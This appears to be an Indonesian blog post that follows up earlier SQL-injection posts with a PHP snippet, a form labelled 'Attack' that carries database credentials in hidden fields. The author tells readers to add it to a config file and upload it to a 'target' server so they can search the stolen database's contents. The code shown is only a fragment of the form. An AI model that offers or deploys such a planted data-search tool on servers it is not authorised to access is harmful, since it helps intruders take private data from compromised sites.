HACK database menggunakan PHP…

Hai hai…

Mas mas, mba mba, teteh teteh, aa aa semua…

Kemarin kemarin kan kita udh coba hack database website dengan menggunakan SQL injection seperti yang sudah dijelaskan oleh saudara tomy, aziz dan fajri…

Sekarang kita coba melakukan pencarian data menggunakan PHP yuks..

Dengan permasalahan kalo target kita memiliki database yang sangat kompleks kan bikin kita ribet aja, nih ada sintak biar kita lebih gampang nyari datanya secara otomatis, jd ga usah cape cape…

Nih sintaknya:

echo "<font color=\"#FFFF00\" size=\"3\">Cari data pada basisdata

$db</font>";

echo "

<form name=\"form1\" method=\"post\" action=\"caridatadb.php\">

<table width=\"325\" border=\"1\" cellspacing=\"1\" cellpadding=\"0\"

bordercolor=\"#0000FF\">

<tr bgcolor=\"#000000\">

<td width=\"150\"><font color=\"#FFFF00\" size=\"2\">Cari Data</td>

<td width=\"4\">:</td>

<td width=\"170\"><input name=\"data\" type=\"text\" id=\"data\">

<input type=\"hidden\" name=\"db\" value=\"$db\">

<input type=\"hidden\" name=\"server\" value=\"$server\">

<input type=\"hidden\" name=\"user\" value=\"$user\">

<input type=\"hidden\" name=\"password\" value=\"$password\"></td>

</tr>

<tr bgcolor=\"#000000\">

<td></td>

<td></td>

<td><input name=\"submit\" type=submit id=\"submit\"

value=\"Attack\"></td>

</tr>

</table>

</form> ";

Nah kita tambahkan script pada config1.php dan buat file baru bernama caridatadb.php…

Trus upload dech ke server target..

Sintak ini juga berguna banget buat nyari data di website kalian masing2 lo.

and thankz to http://holichaxor.com/hacking/exploit-database-via-php-script#more-368

One thought on “HACK database menggunakan PHP…

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s